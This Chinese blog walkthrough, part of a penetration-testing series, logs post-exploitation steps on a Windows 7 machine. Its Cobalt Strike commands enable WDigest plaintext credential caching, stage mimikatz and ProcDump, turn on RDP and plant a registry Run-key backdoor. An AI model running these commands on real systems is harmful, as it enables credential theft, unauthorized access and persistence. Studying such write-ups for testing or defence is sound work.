主页 > 网络知识 > 渗透贯穿始终中篇(4)

渗透贯穿始终中篇(4)

20201122180850356.png

修改注册表

beacon> shell reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

20201122182652229.png

上传ProcDump

菜刀上传mimikatz

20201122183939823.png

查看当前win7用户信息

20201122202637474.png

20201122202737402.png

修改账户密码

20201122203130149.png

进行远程登录

20201122204232348.png

查看3389端口

beacon> shell REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

20201122204929138.png

开启3389
beacon> shell REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

20201122205020196.png

远程登录

20201122205232482.png

20201122205336356.png

win7持久后门之注册表 shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "calm" /t REG_SZ /d "C:\Users\calmness\calmnexx.exe" /f

或者

getshell

通过访问目标地址,进行抓包。

2020112221042929.png

对phpinfo进行漏洞攻击,发现xmlrpc

进行分析

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!

您可能还会对这些文章感兴趣!